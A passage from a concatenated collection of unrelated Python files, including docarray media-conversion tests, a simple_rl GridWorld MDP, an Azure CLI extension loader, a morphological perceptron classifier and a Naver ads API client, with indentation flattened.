self.test.fail('No expectations - actual "%s"' % txt)
return
for x in range(0, len(self.expects)):
chk = self.expects[x]
if chk.match(txt):
del self.expects[x]
return
self.test.fail('"%s" was not expected' % txt)
def flush(self):
pass
|
import os
import numpy as np
import pytest
from docarray import Document
from docarray.document.generators import from_files
from docarray.helper import __windows__
cur_dir = os.path.dirname(os.path.abspath(__file__))
def test_video_convert_pipe(pytestconfig, tmpdir):
num_d = 0
fname = str(tmpdir / f'tmp{num_d}.mp4')
d = Document(uri=os.path.join(cur_dir, 'toydata/mov_bbb.mp4'))
d.load_uri_to_video_tensor()
d.save_video_tensor_to_file(fname)
assert os.path.exists(fname)
def test_audio_convert_pipe(pytestconfig, tmpdir):
num_d = 0
for d in from_files(f'{cur_dir}/toydata/*.wav'):
fname = str(tmpdir / f'tmp{num_d}.wav')
d.load_uri_to_audio_tensor()
d.tensor = d.tensor[::-1]
d.save_audio_tensor_to_file(fname)
assert os.path.exists(fname)
num_d += 1
assert num_d
def test_image_convert_pipe(pytestconfig):
for d in from_files(f'{pytestconfig.rootdir}/.github/**/*.png'):
(
d.load_uri_to_image_tensor()
.convert_uri_to_datauri()
.set_image_tensor_shape((64, 64))
.set_image_tensor_normalization()
.set_image_tensor_channel_axis(-1, 0)
)
assert d.tensor.shape == (3, 64, 64)
assert d.uri
def test_uri_to_tensor():
doc = Document(uri=os.path.join(cur_dir, 'toydata/test.png'))
doc.load_uri_to_image_tensor()
assert isinstance(doc.tensor, np.ndarray)
assert doc.tensor.shape == (85, 152, 3) # h,w,c
assert doc.mime_type == 'image/png'
def test_datauri_to_tensor():
doc = Document(uri=os.path.join(cur_dir, 'toydata/test.png'))
doc.convert_uri_to_datauri()
assert not doc.tensor
assert doc.mime_type == 'image/png'
def test_blob_to_tensor():
doc = Document(uri=os.path.join(cur_dir, 'toydata/test.png'))
doc.load_uri_to_blob()
doc.convert_blob_to_image_tensor()
assert isinstance(doc.tensor, np.ndarray)
assert doc.mime_type == 'image/png'
assert doc.tensor.shape == (85, 152, 3) # h,w,c
def test_convert_blob_to_tensor():
rand_state = np.random.RandomState(0)
array = rand_state.random([10, 10])
doc = Document(content=array.tobytes())
assert doc.content_type == 'blob'
intialiazed_blob = doc.blob
doc.convert_blob_to_tensor()
assert doc.content_type == 'tensor'
converted_blob_in_one_of = doc.blob
assert intialiazed_blob != converted_blob_in_one_of
np.testing.assert_almost_equal(doc.content.reshape([10, 10]), array)
@pytest.mark.parametrize('shape, channel_axis', [((3, 32, 32), 0), ((32, 32, 3), -1)])
def test_image_normalize(shape, channel_axis):
doc = Document(content=np.random.randint(0, 255, shape, dtype=np.uint8))
doc.set_image_tensor_normalization(channel_axis=channel_axis)
assert doc.tensor.ndim == 3
assert doc.tensor.shape == shape
assert doc.tensor.dtype == np.float32
@pytest.mark.parametrize(
'arr_size, channel_axis, height, width',
[
([32, 28, 3], -1, 32, 28), # h, w, c (rgb)
([3, 32, 28], 0, 32, 28), # c, h, w (rgb)
([1, 32, 28], 0, 32, 28), # c, h, w, (greyscale)
([32, 28, 1], -1, 32, 28), # h, w, c, (greyscale)
],
)
def test_convert_image_tensor_to_uri(arr_size, channel_axis, width, height):
doc = Document(content=np.random.randint(0, 255, arr_size))
assert doc.tensor.any()
assert not doc.uri
doc.set_image_tensor_shape(channel_axis=channel_axis, shape=(width, height))
doc.convert_image_tensor_to_uri(channel_axis=channel_axis)
assert doc.uri.startswith('data:image/png;base64,')
assert doc.mime_type == 'image/png'
assert doc.tensor.any() # assure after conversion tensor still exist.
@pytest.mark.xfail(
condition=__windows__, reason='x-python is not detected on windows CI'
)
@pytest.mark.parametrize(
'uri, mimetype',
[
(__file__, 'text/x-python'),
('http://google.com/index.html', 'text/html'),
('https://google.com/index.html', 'text/html'),
],
)
def test_convert_uri_to_blob(uri, mimetype):
d = Document(uri=uri)
assert not d.blob
d.load_uri_to_blob()
assert d.blob
assert d.mime_type == mimetype
@pytest.mark.parametrize(
'converter', ['convert_blob_to_datauri', 'convert_content_to_datauri']
)
def test_convert_blob_to_uri(converter):
d = Document(content=open(__file__).read().encode(), mime_type='text/x-python')
assert d.blob
getattr(d, converter)()
assert d.uri.startswith('data:text/x-python;')
@pytest.mark.parametrize(
'converter', ['convert_text_to_datauri', 'convert_content_to_datauri']
)
def test_convert_text_to_uri(converter):
d = Document(content=open(__file__).read())
assert d.text
getattr(d, converter)()
assert d.uri.startswith('data:text/plain;')
@pytest.mark.xfail(
condition=__windows__, reason='x-python is not detected on windows CI'
)
@pytest.mark.parametrize(
'uri, mimetype',
[
pytest.param(
__file__,
'text/x-python',
marks=pytest.mark.xfail(
condition=__windows__, reason='x-python is not detected on windows CI'
),
),
('http://google.com/index.html', 'text/html'),
('https://google.com/index.html', 'text/html'),
],
)
def test_convert_uri_to_text(uri, mimetype):
doc = Document(uri=uri, mime_type=mimetype)
doc.load_uri_to_text()
if mimetype == 'text/html':
assert '<!doctype html>' in doc.text
elif mimetype == 'text/x-python':
text_from_file = open(__file__).read()
assert doc.text == text_from_file
def test_convert_text_to_uri_and_back():
text_from_file = open(__file__).read()
doc = Document(content=text_from_file, mime_type='text/x-python')
assert doc.text
assert doc.mime_type == 'text/x-python'
doc.convert_text_to_datauri()
doc.load_uri_to_text()
assert doc.mime_type == 'text/plain'
assert doc.text == text_from_file
def test_convert_text_diff_encoding(tmpfile):
otext = 'testä'
text = otext.encode('iso8859')
with open(tmpfile, 'wb') as fp:
fp.write(text)
with pytest.raises(UnicodeDecodeError):
d = Document(uri=str(tmpfile)).load_uri_to_text()
d = Document(uri=str(tmpfile)).load_uri_to_text(charset='iso8859')
assert d.text == otext
with open(tmpfile, 'w', encoding='iso8859') as fp:
fp.write(otext)
with pytest.raises(UnicodeDecodeError):
d = Document(uri=str(tmpfile)).load_uri_to_text()
d = Document(uri=str(tmpfile)).load_uri_to_text(charset='iso8859')
assert d.text == otext
def test_convert_content_to_uri():
d = Document(content=np.random.random([10, 10]))
with pytest.raises(NotImplementedError):
d.convert_content_to_datauri()
@pytest.mark.parametrize(
'uri, mimetype',
[
(__file__, 'text/x-python'),
('http://google.com/index.html', 'text/html'),
('https://google.com/index.html', 'text/html'),
],
)
def test_convert_uri_to_data_uri(uri, mimetype):
doc = Document(uri=uri, mime_type=mimetype)
doc.convert_uri_to_datauri()
assert doc.uri.startswith(f'data:{mimetype}')
assert doc.mime_type == mimetype
def test_glb_converters():
doc = Document(uri=os.path.join(cur_dir, 'toydata/test.glb'))
doc.load_uri_to_point_cloud_tensor(2000)
assert doc.tensor.shape == (2000, 3)
doc.load_uri_to_point_cloud_tensor(2000, as_chunks=True)
assert len(doc.chunks) == 1
assert doc.chunks[0].tensor.shape == (2000, 3)
|
''' GridWorldMDPClass.py: Contains the GridWorldMDP class. '''
# Python imports.
from __future__ import print_function
import random
import sys
import os
import numpy as np
# Other imports.
from simple_rl.mdp.MDPClass import MDP
from simple_rl.tasks.grid_world.GridWorldStateClass import GridWorldState
# Fix input to cooperate with python 2 and 3.
try:
input = raw_input
except NameError:
pass
class GridWorldMDP(MDP):
''' Class for a Grid World MDP '''
# Static constants.
ACTIONS = ["up", "down", "left", "right"]
def __init__(self,
width=5,
height=3,
init_loc=(1,1),
rand_init=False,
goal_locs=[(5,3)],
lava_locs=[()],
walls=[],
is_goal_terminal=True,
gamma=0.99,
init_state=None,
slip_prob=0.0,
step_cost=0.0,
lava_cost=0.01,
name="gridworld"):
'''
Args:
height (int)
width (int)
init_loc (tuple: (int, int))
goal_locs (list of tuples: [(int, int)...])
lava_locs (list of tuples: [(int, int)...]): These locations return -1 reward.
'''
# Setup init location.
self.rand_init = rand_init
if rand_init:
init_loc = random.randint(1, width), random.randint(1, height)
while init_loc in walls:
init_loc = random.randint(1, width), random.randint(1, height)
self.init_loc = init_loc
init_state = GridWorldState(init_loc[0], init_loc[1]) if init_state is None or rand_init else init_state
MDP.__init__(self, GridWorldMDP.ACTIONS, self._transition_func, self._reward_func, init_state=init_state, gamma=gamma)
if type(goal_locs) is not list:
raise ValueError("(simple_rl) GridWorld Error: argument @goal_locs needs to be a list of locations. For example: [(3,3), (4,3)].")
self.step_cost = step_cost
self.lava_cost = lava_cost
self.walls = walls
self.width = width
self.height = height
self.goal_locs = goal_locs
self.cur_state = GridWorldState(init_loc[0], init_loc[1])
self.is_goal_terminal = is_goal_terminal
self.slip_prob = slip_prob
self.name = name
self.lava_locs = lava_locs
def set_slip_prob(self, slip_prob):
self.slip_prob = slip_prob
def get_slip_prob(self):
return self.slip_prob
def is_goal_state(self, state):
return (state.x, state.y) in self.goal_locs
def _reward_func(self, state, action):
'''
Args:
state (State)
action (str)
Returns
(float)
'''
if self._is_goal_state_action(state, action):
return 1.0 - self.step_cost
elif (int(state.x), int(state.y)) in self.lava_locs:
return -self.lava_cost
else:
return 0 - self.step_cost
def _is_goal_state_action(self, state, action):
'''
Args:
state (State)
action (str)
Returns:
(bool): True iff the state-action pair send the agent to the goal state.
'''
if (state.x, state.y) in self.goal_locs and self.is_goal_terminal:
# Already at terminal.
return False
if action == "left" and (state.x - 1, state.y) in self.goal_locs:
return True
elif action == "right" and (state.x + 1, state.y) in self.goal_locs:
return True
elif action == "down" and (state.x, state.y - 1) in self.goal_locs:
return True
elif action == "up" and (state.x, state.y + 1) in self.goal_locs:
return True
else:
return False
def _transition_func(self, state, action):
'''
Args:
state (State)
action (str)
Returns
(State)
'''
if state.is_terminal():
return state
r = random.random()
if self.slip_prob > r:
# Flip dir.
if action == "up":
action = random.choice(["left", "right"])
elif action == "down":
action = random.choice(["left", "right"])
elif action == "left":
action = random.choice(["up", "down"])
elif action == "right":
action = random.choice(["up", "down"])
if action == "up" and state.y < self.height and not self.is_wall(state.x, state.y + 1):
next_state = GridWorldState(state.x, state.y + 1)
elif action == "down" and state.y > 1 and not self.is_wall(state.x, state.y - 1):
next_state = GridWorldState(state.x, state.y - 1)
elif action == "right" and state.x < self.width and not self.is_wall(state.x + 1, state.y):
next_state = GridWorldState(state.x + 1, state.y)
elif action == "left" and state.x > 1 and not self.is_wall(state.x - 1, state.y):
next_state = GridWorldState(state.x - 1, state.y)
else:
next_state = GridWorldState(state.x, state.y)
if (next_state.x, next_state.y) in self.goal_locs and self.is_goal_terminal:
next_state.set_terminal(True)
return next_state
def is_wall(self, x, y):
'''
Args:
x (int)
y (int)
Returns:
(bool): True iff (x,y) is a wall location.
'''
return (x, y) in self.walls
def __str__(self):
return self.name + "_h-" + str(self.height) + "_w-" + str(self.width)
def __repr__(self):
return self.__str__()
def get_goal_locs(self):
return self.goal_locs
def get_lava_locs(self):
return self.lava_locs
def visualize_policy(self, policy):
from simple_rl.utils import mdp_visualizer as mdpv
from simple_rl.tasks.grid_world.grid_visualizer import _draw_state
action_char_dict = {
"up":"^", #u"\u2191",
"down":"v", #u"\u2193",
"left":"<", #u"\u2190",
"right":">", #u"\u2192"
}
mdpv.visualize_policy(self, policy, _draw_state, action_char_dict)
input("Press anything to quit")
def visualize_agent(self, agent):
from simple_rl.utils import mdp_visualizer as mdpv
from simple_rl.tasks.grid_world.grid_visualizer import _draw_state
mdpv.visualize_agent(self, agent, _draw_state)
input("Press anything to quit")
def visualize_value(self):
from simple_rl.utils import mdp_visualizer as mdpv
from simple_rl.tasks.grid_world.grid_visualizer import _draw_state
mdpv.visualize_value(self, _draw_state)
input("Press anything to quit")
def visualize_learning(self, agent, delay=0.0):
from simple_rl.utils import mdp_visualizer as mdpv
from simple_rl.tasks.grid_world.grid_visualizer import _draw_state
mdpv.visualize_learning(self, agent, _draw_state, delay=delay)
input("Press anything to quit")
def visualize_interaction(self):
from simple_rl.utils import mdp_visualizer as mdpv
from simple_rl.tasks.grid_world.grid_visualizer import _draw_state
mdpv.visualize_interaction(self, _draw_state)
input("Press anything to quit")
def _error_check(state, action):
'''
Args:
state (State)
action (str)
Summary:
Checks to make sure the received state and action are of the right type.
'''
if action not in GridWorldMDP.ACTIONS:
raise ValueError("(simple_rl) GridWorldError: the action provided (" + str(action) + ") was invalid in state: " + str(state) + ".")
if not isinstance(state, GridWorldState):
raise ValueError("(simple_rl) GridWorldError: the given state (" + str(state) + ") was not of the correct class.")
def make_grid_world_from_file(file_name, randomize=False, num_goals=1, name=None, goal_num=None, slip_prob=0.0):
'''
Args:
file_name (str)
randomize (bool): If true, chooses a random agent location and goal location.
num_goals (int)
name (str)
Returns:
(GridWorldMDP)
Summary:
Builds a GridWorldMDP from a file:
'w' --> wall
'a' --> agent
'g' --> goal
'-' --> empty
'''
if name is None:
name = file_name.split(".")[0]
# grid_path = os.path.dirname(os.path.realpath(__file__))
wall_file = open(os.path.join(os.getcwd(), file_name))
wall_lines = wall_file.readlines()
# Get walls, agent, goal loc.
num_rows = len(wall_lines)
num_cols = len(wall_lines[0].strip())
empty_cells = []
agent_x, agent_y = 1, 1
walls = []
goal_locs = []
lava_locs = []
for i, line in enumerate(wall_lines):
line = line.strip()
for j, ch in enumerate(line):
if ch == "w":
walls.append((j + 1, num_rows - i))
elif ch == "g":
goal_locs.append((j + 1, num_rows - i))
elif ch == "l":
lava_locs.append((j + 1, num_rows - i))
elif ch == "a":
agent_x, agent_y = j + 1, num_rows - i
elif ch == "-":
empty_cells.append((j + 1, num_rows - i))
if goal_num is not None:
goal_locs = [goal_locs[goal_num % len(goal_locs)]]
if randomize:
agent_x, agent_y = random.choice(empty_cells)
if len(goal_locs) == 0:
# Sample @num_goals random goal locations.
goal_locs = random.sample(empty_cells, num_goals)
else:
goal_locs = random.sample(goal_locs, num_goals)
if len(goal_locs) == 0:
goal_locs = [(num_cols, num_rows)]
return GridWorldMDP(width=num_cols, height=num_rows, init_loc=(agent_x, agent_y), goal_locs=goal_locs, lava_locs=lava_locs, walls=walls, name=name, slip_prob=slip_prob)
def reset(self):
if self.rand_init:
init_loc = random.randint(1, width), random.randint(1, height)
self.cur_state = GridWorldState(init_loc[0], init_loc[1])
else:
self.cur_state = copy.deepcopy(self.init_state)
def main():
grid_world = GridWorldMDP(5, 10, (1, 1), (6, 7))
grid_world.visualize()
if __name__ == "__main__":
main()
|
"""
XStatic resource package
See package 'XStatic' for documentation and basic tools.
"""
# official name, upper/lowercase allowed, no spaces
DISPLAY_NAME = 'bootswatch'
# name used for PyPi
PACKAGE_NAME = 'XStatic-%s' % DISPLAY_NAME
NAME = __name__.split('.')[-1] # package name (e.g. 'foo' or 'foo_bar')
# please use a all-lowercase valid python
# package name
VERSION = '3.3.7' # version of the packaged files, please use the upstream
# version number
BUILD = '0' # our package build number, so we can release new builds
# with fixes for xstatic stuff.
PACKAGE_VERSION = VERSION + '.' + BUILD # version used for PyPi
DESCRIPTION = "%s %s (XStatic packaging standard)" % (DISPLAY_NAME, VERSION)
PLATFORMS = 'any'
CLASSIFIERS = []
KEYWORDS = 'bootswatch xstatic'
# XStatic-* package maintainer:
MAINTAINER = 'Rob Cresswell'
MAINTAINER_EMAIL = 'robert.cresswell@outlook.com'
# this refers to the project homepage of the stuff we packaged:
HOMEPAGE = 'http://bootswatch.com'
# this refers to all files:
LICENSE = 'MIT'
from os.path import join, dirname
BASE_DIR = join(dirname(__file__), 'data')
# linux package maintainers just can point to their file locations like this:
#BASE_DIR = '/usr/share/javascript/' + NAME
# location of the Javascript file that's the entry point for this package, if
# one exists, relative to BASE_DIR
LOCATIONS = {
# CDN locations (if no public CDN exists, use an empty dict)
# if value is a string, it is a base location, just append relative
# path/filename. if value is a dict, do another lookup using the
# relative path/filename you want.
# your relative path/filenames should usually be without version
# information, because either the base dir/url is exactly for this
# version or the mapping will care for accessing this version.
}
|
# Copyright (c) 2019 Seven Bridges. See LICENSE
__version__ = "2019.11.27"
|
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from azure.cli.core import AzCommandsLoader
from azext_identitydirmgt.generated._help import helps # pylint: disable=unused-import
try:
from azext_identitydirmgt.manual._help import helps # pylint: disable=reimported
except ImportError as e:
if e.name.endswith('manual._help'):
pass
else:
raise e
class IdentityDirectoryManagementCommandsLoader(AzCommandsLoader):
def __init__(self, cli_ctx=None):
from azure.cli.core.commands import CliCommandType
from azext_identitydirmgt.generated._client_factory import cf_identitydirmgt_cl
identitydirmgt_custom = CliCommandType(
operations_tmpl='azext_identitydirmgt.custom#{}',
client_factory=cf_identitydirmgt_cl)
parent = super(IdentityDirectoryManagementCommandsLoader, self)
parent.__init__(cli_ctx=cli_ctx, custom_command_type=identitydirmgt_custom)
def load_command_table(self, args):
from azext_identitydirmgt.generated.commands import load_command_table
load_command_table(self, args)
try:
from azext_identitydirmgt.manual.commands import load_command_table as load_command_table_manual
load_command_table_manual(self, args)
except ImportError as e:
if e.name.endswith('manual.commands'):
pass
else:
raise e
return self.command_table
def load_arguments(self, command):
from azext_identitydirmgt.generated._params import load_arguments
load_arguments(self, command)
try:
from azext_identitydirmgt.manual._params import load_arguments as load_arguments_manual
load_arguments_manual(self, command)
except ImportError as e:
if e.name.endswith('manual._params'):
pass
else:
raise e
COMMAND_LOADER_CLS = IdentityDirectoryManagementCommandsLoader
|
import numpy as np
import cvxpy as cp
import dccp
import matplotlib.pyplot as plt
from matplotlib.patches import Polygon
from sklearn.base import BaseEstimator, ClassifierMixin, TransformerMixin
from sklearn.utils.multiclass import unique_labels
from sklearn.metrics import pairwise_distances
from sklearn.utils.validation import check_X_y, check_array, check_is_fitted
from sklearn.model_selection import StratifiedKFold
import time
# ##################################################
# Plot the decision boundary of a classifier
# ##################################################
def decision_boundary(self, X, y, ind=[0,1], Nh = 101, colors="black", label = None):
# Scatter plot
sc = plt.scatter(X[:,ind[0]], X[:,ind[1]], c = y.astype(int))
xlimits = plt.xlim()
ylimits = plt.ylim()
if X.shape[1]>2:
print("Dimension larger than two! Cannot show the decision boundary!")
else:
# create a mesh to plot in
x_min, x_max = xlimits[0], xlimits[1]
y_min, y_max = ylimits[0], ylimits[1]
hx = (x_max-x_min)/Nh
hy = (y_max-y_min)/Nh
xx, yy = np.meshgrid(np.arange(x_min, x_max, hx),np.arange(y_min, y_max, hy))
# Plot the decision boundary. For that, we will assign a color to each
# point in the mesh [x_min, m_max]x[y_min, y_max].
Z = np.array(self.predict(np.c_[xx.ravel(), yy.ravel()]))
Z = Z.reshape(xx.shape)
# Put the result into a color plot
plt.contourf(xx, yy, Z, alpha = 0.1, cmap='plasma')
plt.contour(xx, yy, Z, colors=colors, linestyles = 'dashed')
plt.grid("True")
plt.xlabel("Variable %d" % ind[0])
plt.ylabel("Variable %d" % ind[1])
return sc
# ##################################################
# Ensemble (or Bagging) Transform
# ##################################################
class EnsembleTransform(TransformerMixin, BaseEstimator):
def __init__(self,ensemble):
self.ensemble = ensemble
def fit(self, X, y):
(self.ensemble).fit(X, y)
return self
def transform(self, X):
return np.vstack([clf.decision_function(X) for clf in (self.ensemble).estimators_]).T
# ##################################################
# Dilation-Erosion Perceptron with DCCP
# ##################################################
class DEP(BaseEstimator, ClassifierMixin):
def __init__(self, weighted = True, ref = "maximum", C = 1.e-2,
beta = None, beta_loss = "hinge", Split2Beta = False,
solver = cp.MOSEK, verbose = False):
self.verbose = verbose
self.solver = solver
self.weighted = weighted
self.ref = ref
self.C = C
self.beta = beta
self.beta_loss = beta_loss
self.Split2Beta = Split2Beta
def fit(self, X, y):
start_time = time.time()
# Check that X and y have correct shape
X, y = check_X_y(X, y)
# Store the classes seen during fit
self.classes_ = unique_labels(y)
if len(self.classes_)>2:
print("Dilation-Erosion Morphological Perceptron can be used for binary classification!")
return
if self.Split2Beta == True:
skf = StratifiedKFold(n_splits=3, shuffle=True)
WM_index, beta_index = next(iter(skf.split(X,y)))
X_WM, X_beta = X[WM_index], X[beta_index]
y_WM, y_beta = y[WM_index], y[beta_index]
else:
X_WM, X_beta = X, X
y_WM, y_beta = y, y
M, N = X_beta.shape
indPos = (y_WM == self.classes_[1])
Xpos = X_WM[indPos,:]
Xneg = X_WM[~indPos,:]
Mpos = Xpos.shape[0]
Mneg = Xneg.shape[0]
if self.weighted == True:
Lpos = 1/pairwise_distances(Xpos,[np.mean(Xpos,axis=0)],metric="euclidean").flatten()
Lneg = 1/pairwise_distances(Xneg,[np.mean(Xneg,axis=0)],metric="euclidean").flatten()
nuPos = Lpos/Lpos.max()
nuNeg = Lneg/Lneg.max()
else:
nuPos = np.ones((Mpos))
nuNeg = np.ones((Mneg))
# Solve DCCP problem for dilation
if self.ref == "mean":
ref = -np.mean(Xneg,axis=0).reshape((1,N))
elif self.ref == "maximum":
ref = -np.max(Xneg,axis=0).reshape((1,N))
elif self.ref == "minimum":
ref = -np.min(Xneg,axis=0).reshape((1,N))
else:
ref = np.zeros((1,N))
w = cp.Variable((1,N))
xiPos = cp.Variable((Mpos))
xiNeg = cp.Variable((Mneg))
lossDil = cp.sum(nuPos*cp.pos(xiPos))/Mpos+cp.sum(nuNeg*cp.pos(xiNeg))/Mneg+self.C*cp.norm(w-ref,1)
objectiveDil = cp.Minimize(lossDil)
ZposDil = cp.max(np.ones((Mpos,1))@w + Xpos, axis=1)
ZnegDil = cp.max(np.ones((Mneg,1))@w + Xneg, axis=1)
constraintsDil = [ZposDil >= -xiPos, ZnegDil <= xiNeg]
probDil = cp.Problem(objectiveDil,constraintsDil)
probDil.solve(solver=self.solver, method = 'dccp', verbose = self.verbose)
self.dil_ = (w.value).flatten()
# Solve DCCP problem for erosion
if self.ref == "mean":
ref = -np.mean(Xpos,axis=0).reshape((1,N))
elif self.ref == "maximum":
ref = -np.min(Xpos,axis=0).reshape((1,N))
elif self.ref == "minimum":
ref = -np.max(Xpos,axis=0).reshape((1,N))
else:
ref = np.zeros((1,N))
m = cp.Variable((1,N))
etaPos = cp.Variable((Mpos))
etaNeg = cp.Variable((Mneg))
lossEro = cp.sum(nuPos*cp.pos(etaPos))/Mpos+cp.sum(nuNeg*cp.pos(etaNeg))/Mneg+self.C*cp.norm(m-ref,1)
objectiveEro = cp.Minimize(lossEro)
ZposEro = cp.min(np.ones((Mpos,1))@m + Xpos, axis=1)
ZnegEro = cp.min(np.ones((Mneg,1))@m + Xneg, axis=1)
constraintsEro = [ZposEro >= -etaPos, ZnegEro <= etaNeg]
probEro = cp.Problem(objectiveEro,constraintsEro)
probEro.solve(solver=self.solver, method = 'dccp', verbose = self.verbose)
self.ero_ = (m.value).flatten()
# Fine tune beta
if self.beta == None:
beta = cp.Variable(nonneg=True)
beta.value = 0.5
if self.beta_loss == "squared_hinge":
# Squared Hinge Loss
lossBeta = cp.sum_squares(cp.pos(-cp.multiply(2*((y_beta == self.classes_[1]).astype(int))-1,
beta*cp.max(np.ones((M,1))@w.value + X_beta, axis=1) +
(1-beta)*cp.min(np.ones((M,1))@m.value + X_beta, axis=1))))
else:
# Hinge Loss
lossBeta = cp.sum(cp.pos(-cp.multiply(2*((y_beta == self.classes_[1]).astype(int))-1,
beta*cp.max(np.ones((M,1))@w.value + X_beta, axis=1) +
(1-beta)*cp.min(np.ones((M,1))@m.value + X_beta, axis=1))))
constraintsBeta = [beta<=1]
probBeta = cp.Problem(cp.Minimize(lossBeta),constraintsBeta)
probBeta.solve(solver = cp.SCS, verbose = self.verbose, warm_start=True)
self.beta = beta.value
if self.verbose == True:
print("\nTime to train: %2.2f seconds." % (time.time() - start_time))
return self
def decision_function(self, X):
# Check is fit had been called
check_is_fitted(self,attributes="dil_")
# Input validation
X = check_array(X)
M,N = X.shape
Y = np.zeros((M,2))
# Compute the dilation
Y[:,0] = np.amax(np.ones((M,1))@self.dil_.reshape((1,N))+X,axis=1)
# Compute the erosion
Y[:,1] = np.amin(np.ones((M,1))@self.ero_.reshape((1,N))+X,axis=1)
return np.dot(Y,np.array([self.beta,1-self.beta]))
def predict(self, X):
return np.array([self.classes_[(y>=0).astype(int)] for y in self.decision_function(X)])
def show(self, X, y, ind=[0,1], show_boxes = True, decision_boundary = True, Nh = 101):
# Check that X and y have correct shape
X, y = check_X_y(X, y)
# Check is fit had been called
check_is_fitted(self,attributes="dil_")
plt.figure(figsize=(10, 8))
# Scatter plot
sc = plt.scatter(X[:,ind[0]], X[:,ind[1]], c = y.astype(int))
xlimits = plt.xlim()
ylimits = plt.ylim()
if decision_boundary:
if X.shape[1]>2:
print("Dimension larger than two! Cannot show the decision boundary!")
else:
# create a mesh to plot in
x_min, x_max = xlimits[0], xlimits[1]
y_min, y_max = ylimits[0], ylimits[1]
hx = (x_max-x_min)/Nh
hy = (y_max-y_min)/Nh
xx, yy = np.meshgrid(np.arange(x_min, x_max, hx),np.arange(y_min, y_max, hy))
# Plot the decision boundary. For that, we will assign a color to each
# point in the mesh [x_min, m_max]x[y_min, y_max].
Z = np.array(self.predict(np.c_[xx.ravel(), yy.ravel()]))
Z = Z.reshape(xx.shape)
# Put the result into a color plot
plt.contourf(xx, yy, Z, alpha = 0.1, cmap='plasma')
plt.contour(xx, yy, Z, colors='black', linestyles = 'dashed')
if show_boxes:
# Draw dilation box
box = [-1000*np.ones((X.shape[1],)),-self.dil_]
Vertices = np.array([box[0][ind],[box[1][ind[0]],box[0][ind[1]]],box[1][ind],[box[0][ind[0]],box[1][ind[1]]]])
plt.gca().add_patch(Polygon(Vertices, alpha = 0.3, color=sc.to_rgba(0)))
# Draw erosion box
box = [-self.ero_,1000*np.ones((X.shape[1],))]
Vertices = np.array([box[0][ind],[box[1][ind[0]],box[0][ind[1]]],box[1][ind],[box[0][ind[0]],box[1][ind[1]]]])
plt.gca().add_patch(Polygon(Vertices, alpha = 0.3, color=sc.to_rgba(1)))
plt.grid(True)
plt.xlabel("Variable %d" % ind[0])
plt.ylabel("Variable %d" % ind[1])
|
from nevada.Common.Connector import *
from typing import List
import jsonpickle
import json
class AdFieldObject:
def __init__(self, json_def=None):
if type(json_def) is str:
json_def = json.loads(json_def)
s = json_def
self.pc_display = None if 'pc' not in s else self.pc_display_easy(s['pc'])
self.pc_final = None if 'pc' not in s else self.pc_final_easy(s['pc'])
self.mobile_display = None if 'mobile' not in s else self.mobile_display_easy(s['mobile'])
self.mobile_final = None if 'mobile' not in s else self.mobile_final_easy(s['mobile'])
self.headline = None if 'headline' not in s else s['headline']
self.description = None if 'description' not in s else s['description']
def pc_final_easy(self, pc):
return pc['final']
def pc_display_easy(self, pc):
return pc['display']
def mobile_final_easy(self, mobile):
return mobile['final']
def mobile_display_easy(self, mobile):
return mobile['display']
class UpdateAdObject:
def __init__(self, adAttr, nccAdId, inspectRequestMsg=None, userLock = None):
self.adAttr = adAttr
self.inspectRequestMsg = inspectRequestMsg
self.nccAdId = nccAdId
self.userLock = userLock
class CreateAdObject:
def __init__(self, adObject, nccAdgroupId, type, inspectRequestMsg=None, userLock=None):
self.ad = adObject
self.inspectRequestMsg = inspectRequestMsg
self.nccAdgroupId = nccAdgroupId
self.type = type
self.userLock = userLock
class AdObject:
def __init__(self, json_def):
if type(json_def) is str:
json_def = json.loads(json_def)
s = json_def
self.ad = None if 'ad' not in s else AdFieldObject(s['ad'])
self.adattr = None if 'adattr' not in s else s['adattr']
self.customerId = None if 'customerId' not in s else s['customerId']
self.editTm = None if 'editTm' not in s else s['editTm']
self.inspectRequestMsg = None if 'inspectRequestMsg' not in s else s['inspectRequestMsg']
self.inspectStatus = None if 'inspectStatus' not in s else s['inspectStatus']
self.nccAdId = None if 'nccAdId' not in s else s['nccAdId']
self.nccAdgroupId = None if 'nccAdgroupId' not in s else s['nccAdgroupId']
self.regTm = None if 'regTm' not in s else s['regTm']
self.status = None if 'status' not in s else s['status']
self.statusReason = None if 'statusReason' not in s else s['statusReason']
self.type = None if 'type' not in s else s['type']
self.userLock = None if 'userLock' not in s else s['userLock']
class Ad:
def __init__(self, base_url: str, api_key: str, secret_key: str, customer_id: int):
self.conn = Connector(base_url, api_key, secret_key, customer_id)
AdIdList = List[str]
AdObjectList = List[AdObject]
ChangeFieldsList = List[str]
def get(self, adId: str) -> AdObject:
result = self.conn.get('/ncc/ads/' + adId)
return result
def list_by_adgroup_id(self, nccAdGroupId: str) -> AdObjectList:
result = self.conn.get('/ncc/ads', {'nccAdgroupId': nccAdGroupId})
return result
def list(self, ids: AdIdList) -> AdObjectList:
ids = ",".join(ids)
ids = {'ids': ids}
result = self.conn.get('/ncc/ads', ids)
return result
def create(self, adObject, nccAdgroupId, type, inspectRequestMsg, userLock) -> AdObject:
data = jsonpickle.encode(CreateAdObject(adObject, nccAdgroupId, type, inspectRequestMsg, userLock), unpicklable=False)
data = json.loads(data)
data = CommonFunctions.dropna(data)
data_str = data
data_str = json.dumps(data_str)
result = self.conn.post('/ncc/ads', data_str)
return result
def update(self, adId: str, fields: ChangeFieldsList, adAttr, inspectRequestMsg, nccAdId, userLock) -> AdObject:
change_fields_list = ",".join(fields)
query = {'fields': change_fields_list}
data = jsonpickle.encode(UpdateAdObject(adAttr=adAttr, inspectRequestMsg=inspectRequestMsg, nccAdId=nccAdId, userLock=userLock), unpicklable=False)
data = json.loads(data)
data = CommonFunctions.dropna(data)
data_str = data
data_str = json.dumps(data_str)
result = self.conn.put('/ncc/ads/' + adId, data_str, query)
return result
def delete(self, adId: str):
self.conn.delete('/ncc/ads/' + adId)
return True
def copy(self, adId: str, targetAdGroupId: str, userLock: bool) -> AdObject:
query = {'ids': adId, 'targetAdgroupId': targetAdGroupId, 'userLock': userLock}
result = self.conn.put('/ncc/ads', None, query)
return result
|
# Copyright (c) 2017-present, Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
